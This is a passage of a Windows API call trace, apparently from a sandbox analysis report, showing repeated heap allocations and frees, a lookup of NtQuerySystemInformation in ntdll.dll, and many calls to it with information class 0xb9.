0x27fc8db0000 [0230.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e960 [0230.149] GetProcessHeap () returned 0x27fc8db0000 [0230.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x28) returned 0x27fc9f52a50 [0230.149] GetProcessHeap () returned 0x27fc8db0000 [0230.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efaf30 [0230.149] GetProcessHeap () returned 0x27fc8db0000 [0230.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f550 [0230.149] GetProcessHeap () returned 0x27fc8db0000 [0230.149] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x14) returned 0x27fc9e43c90 [0230.149] GetProcessHeap () returned 0x27fc8db0000 [0230.149] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9a18500 | out: hHeap=0x27fc8db0000) returned 1 [0230.149] GetProcessHeap () returned 0x27fc8db0000 [0230.149] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9a193a0 | out: hHeap=0x27fc8db0000) returned 1 [0230.149] GetProcessHeap () returned 0x27fc8db0000 [0230.149] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb980 | out: hHeap=0x27fc8db0000) returned 1 [0230.149] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f750 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e420 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e29e90 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dbd520 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f52a50 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efaf30 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f550 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e960 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f52840 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9df9100 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e43c90 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb8d0 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f840 | out: hHeap=0x27fc8db0000) returned 1 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efbfb0 [0230.150] GetProcessHeap () returned 0x27fc8db0000 [0230.150] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f860 [0230.151] GetProcessHeap () returned 0x27fc8db0000 [0230.151] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xc638) returned 0x27fc9e21dc0 [0230.340] GetProcessHeap () returned 0x27fc8db0000 [0230.340] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xc640) returned 0x27fc9c8d950 [0230.342] GetProcessHeap () returned 0x27fc8db0000 [0230.342] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e420 [0230.342] GetProcessHeap () returned 0x27fc8db0000 [0230.342] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xc648) returned 0x27fc98daf20 [0230.343] GetProcessHeap () returned 0x27fc8db0000 [0230.344] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb4b0 [0230.344] GetProcessHeap () returned 0x27fc8db0000 [0230.344] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f690 [0230.344] GetProcessHeap () returned 0x27fc8db0000 [0230.344] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9c99fa0 | out: hHeap=0x27fc8db0000) returned 1 [0230.344] GetProcessHeap () returned 0x27fc8db0000 [0230.344] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xc6fc) returned 0x27fc9c99fa0 [0230.344] GetProcessHeap () returned 0x27fc8db0000 [0230.344] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xcc) returned 0x27fc9943320 [0230.345] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff430 | out: phModule=0xf7a67ff430*=0x7ffcea380000) returned 1 [0230.345] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0230.362] GetProcessHeap () returned 0x27fc8db0000 [0230.362] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e960 [0230.362] GetProcessHeap () returned 0x27fc8db0000 [0230.362] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x18) returned 0x27fc9e43990 [0230.362] GetProcessHeap () returned 0x27fc8db0000 [0230.362] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efc740 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f580 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f730 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9c8d950 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc98daf20 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb4b0 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f690 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e420 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9c99fa0 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9943320 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e43990 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efc740 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f580 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e960 | out: hHeap=0x27fc8db0000) returned 1 [0230.363] GetProcessHeap () returned 0x27fc8db0000 [0230.363] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e43a90 | out: hHeap=0x27fc8db0000) returned 1 [0230.364] GetProcessHeap () returned 0x27fc8db0000 [0230.364] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e21dc0 | out: hHeap=0x27fc8db0000) returned 1 [0230.364] GetProcessHeap () returned 0x27fc8db0000 [0230.364] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f730 | out: hHeap=0x27fc8db0000) returned 1 [0230.364] GetProcessHeap () returned 0x27fc8db0000 [0230.364] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efbfb0 | out: hHeap=0x27fc8db0000) returned 1 [0230.364] GetProcessHeap () returned 0x27fc8db0000 [0230.364] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f860 | out: hHeap=0x27fc8db0000) returned 1 [0230.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feef0, Length=0x50, ResultLength=0x0) [0230.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feef0, Length=0x50, ResultLength=0x0) [0230.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feef0, Length=0x50, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x50, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x50, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x50, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x50, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x38, ResultLength=0x0) [0230.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x28, ResultLength=0x0) [0230.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x28, ResultLength=0x0) [0230.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x28, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x28, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x38, ResultLength=0x0) [0230.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x28, ResultLength=0x0) [0230.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x28, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea50, Length=0x20, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x38, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x38, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb20, Length=0x20, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb20, Length=0x20, ResultLength=0x0) [0230.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff050, Length=0x50, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff050, Length=0x50, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff050, Length=0x50, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0230.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0230.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0230.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x28, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0230.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff050, Length=0x50, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff050, Length=0x50, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff050, Length=0x50, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0230.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0230.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0230.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0230.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0230.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0230.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0230.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 